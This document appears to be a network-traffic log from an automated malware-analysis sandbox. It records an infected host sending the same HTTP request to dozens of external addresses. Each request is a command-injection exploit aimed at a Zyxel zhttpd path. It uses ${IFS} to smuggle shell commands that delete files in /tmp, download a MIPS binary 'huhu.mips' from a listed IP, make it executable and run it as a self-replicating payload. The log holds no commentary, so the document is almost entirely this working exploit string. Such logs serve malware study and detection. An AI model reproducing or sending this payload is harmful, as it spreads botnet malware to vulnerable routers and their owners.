                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.534574986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3213192.168.2.145367042.173.185.29443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.534614086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3214192.168.2.145735089.62.118.169443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.534641981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3215192.168.2.1437908185.12.9.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.534698009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3216192.168.2.1457598128.163.228.133443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.534733057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3217192.168.2.1438740129.232.207.51443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.534770966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3218192.168.2.1442152193.177.241.55443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.534813881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3219192.168.2.144315459.127.199.131443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.534853935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3220192.168.2.1449476115.46.206.172443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.534899950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3221192.168.2.1451702172.249.45.231443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.534925938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3222192.168.2.1458454142.87.3.148443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.534951925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3223192.168.2.145085674.238.236.200443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.535016060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3224192.168.2.1439562161.30.43.38443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.535044909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3225192.168.2.1453414209.148.250.150443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.535079956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3226192.168.2.143518466.20.30.120443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.535113096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3227192.168.2.1447504102.117.85.15443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.535161018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3228192.168.2.1440956203.123.86.250443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.535188913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3229192.168.2.1457080123.156.168.49443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.535228014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3230192.168.2.1456796101.248.0.233443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.535270929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3231192.168.2.1437416210.197.230.170443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.535298109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3232192.168.2.146030081.105.50.47443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.535343885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3233192.168.2.1437846217.242.30.156443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.535392046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3234192.168.2.1454554163.63.17.170443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.535434961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3235192.168.2.1453620218.172.36.23443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.535475969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3236192.168.2.145274891.93.210.66443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.535505056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3237192.168.2.144703484.24.231.41443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.535547018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3238192.168.2.1442086105.46.41.148443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.535588026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3239192.168.2.143678827.191.61.224443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.535635948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3240192.168.2.144698819.25.250.39443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.535677910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3241192.168.2.144964025.200.11.10443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.535706997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3242192.168.2.144358081.220.158.84443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.535742998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3243192.168.2.145350478.177.144.95443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.535787106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3244192.168.2.1451734120.212.190.51443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.535820007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3245192.168.2.1438540107.29.146.129443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.535856009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3246192.168.2.14343324.158.0.178443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.535901070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3247192.168.2.145028466.118.239.96443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.535938025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3248192.168.2.14560525.145.150.71443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.535983086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3249192.168.2.143408239.204.154.28443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.536026001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3250192.168.2.1455158197.10.246.142443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.536067963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3251192.168.2.1439060126.145.77.185443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.536111116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3252192.168.2.1442212175.133.163.10443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.536158085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3253192.168.2.14474649.255.23.13443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.536210060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3254192.168.2.1443170146.120.191.207443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.536242008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3255192.168.2.144557027.238.231.99443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.536278963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3256192.168.2.144768245.212.47.48443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.536334991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3257192.168.2.144688453.151.62.104443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.536361933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3258192.168.2.143373043.100.166.32443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.536400080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3259192.168.2.1434152173.236.176.125443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.536463022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3260192.168.2.1453864168.75.14.131443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.536487103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3261192.168.2.1450682116.192.44.213443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.536528111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3262192.168.2.1460386118.77.38.104443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.536575079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3263192.168.2.1459120209.222.47.232443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.536600113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3264192.168.2.1453158176.228.50.11443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.536648035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3265192.168.2.1449746114.23.220.90443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.536699057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3266192.168.2.1436932106.24.249.189443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.536736965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3267192.168.2.143556888.211.236.87443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.536793947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3268192.168.2.144268882.86.31.144443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.536823034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3269192.168.2.1434468125.110.143.161443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.536869049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3270192.168.2.145720020.98.232.240443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.536911011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3271192.168.2.1436062142.184.204.236443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.536942959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3272192.168.2.143488099.197.231.129443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.536969900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3273192.168.2.144088463.245.253.27443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.537012100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3274192.168.2.144072425.51.49.25443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.537039042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3275192.168.2.144010497.111.243.141443
                                                      TimestampBytes transferredDirectionData
